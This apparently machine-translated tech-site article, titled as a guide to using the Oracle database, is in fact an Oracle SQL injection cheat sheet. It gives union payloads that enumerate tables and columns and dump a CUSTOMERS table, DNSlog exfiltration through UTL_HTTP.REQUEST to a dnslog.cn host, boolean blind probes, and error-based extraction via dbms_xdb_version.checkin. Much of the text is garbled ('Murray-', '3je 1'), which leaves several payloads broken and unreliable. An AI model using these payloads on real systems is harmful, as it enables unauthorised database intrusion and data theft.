Shulou(Shulou.com)05/31 Report--

This article will explain in detail how to use the Oracle database. The editor thinks it is very practical, so I share it for you as a reference. I hope you can get something after reading this article.

I. Joint injection

1.1. Judge whether there is an injection point.

The method is similar to other databases, and 1 and and 1

1.2. Judge the database as oracle

Comment symbol-this symbol is a comment character supported by Oracle and MsSQL. If you return to normal, you need to continue to judge. You can continue to submit multi-statement support symbols; if you support multi-line queries, it means MSSQL, because Oracle does not support multi-line queries, and you can continue to submit query languages.

And (select count (*) from user_tables) > 0muri-

The principle is that dual table and user_ tables are system tables in oracle. If they return to normal, they will be judged as Oracle.

1.3. Get basic information

1.3.1. Get the number of fields. You can also use oder by N to judge from the returned page.

1.3.2. Judge the number of columns

If union select'1 returns normal, the first field is numeric, error is returned, and character type is returned. Here, the five fields are all character type.

1.3.3. Get the database version

Union select'1, (select banner from sys.v_$version where rownum=1),'3, 4, 5, from dual--

Query, the user to which the current table belongs, which is equivalent to the current library, as follows

1.3.4. Query the first table name

Union select'1, (select table_name from user_tables where rownum=1),'3, 4, 5, from dual--

Union select '1title, (select table_name from user_tables where rownum=1 and table_name' Table name'),'3 from dual, 4 from dual-/ second Table name

View the first field name

Union select'1, (select column_name from user_tab_columns where table_name='CUSTOMERS' and rownum=1),'3, 4, 5, from dual--

View the second field name

Union select'1, (select column_name from user_tab_columns where table_name='CUSTOMERS' and rownum=1 and column_name'id'),'3, 4, 5, from dual--

Look at the third field name, followed by an and column_name' name'

Select column_name from user_tab_columns where table_name=' [table name] 'and rownum=1 and column_name' [first field]' and column_name' [second field name]'

Read data

Union select'1, page1, name, 4, 5, 5, from CUSTOMERS.

II. DNSlog

First, go to http://www.dnslog.cn/ website to apply for a domain name.

UTL_ HTTP.request type

And 1, 2, union select'1, from dual, 5, (select table_name from user_tables where rownum=1), (HTTP.REQUEST) ((request) | | .o69syg.dnslog.cn')

First field name

Union select'1 (select column_name from user_tab_columns where table_name='CUSTOMERS' and rownum=1) ((request) |'. O69syg.dnslog.cn

'),' 4 'from dual 5')

UTL_INADDR.GET_HOST_ ADDRESS DNSlog injection

Third, Boolean blind injection

3.1. Get the number of tables in the current database

And (select count (table_name) from user_tables) > 1 Murray-

3.2. Get the table name length of the first table

And (select length (table_name) from user_tables where rownum=1) > 8 Murray-

Gets the value of the Ascii code for the first character of the first table

And ascii (substr ((select table_name from user_tables where rownum=1), 3je 1)) > 82muri-

IV. Error injection-- error reporting function dbms_xdb_version.checkin () function

4.1. Get database version information

And (select dbms_xdb_version.checkin ((select banner from sys.v_$version where rownum=1)) from dual) is not null--

4.2. Current database name

And (select dbms_xdb_version.checkin ((select user from dual)) from dual) is not null--

This is the end of the article on "how to use Oracle database". I hope the above content can be of some help to you, so that you can learn more knowledge. if you think the article is good, please share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.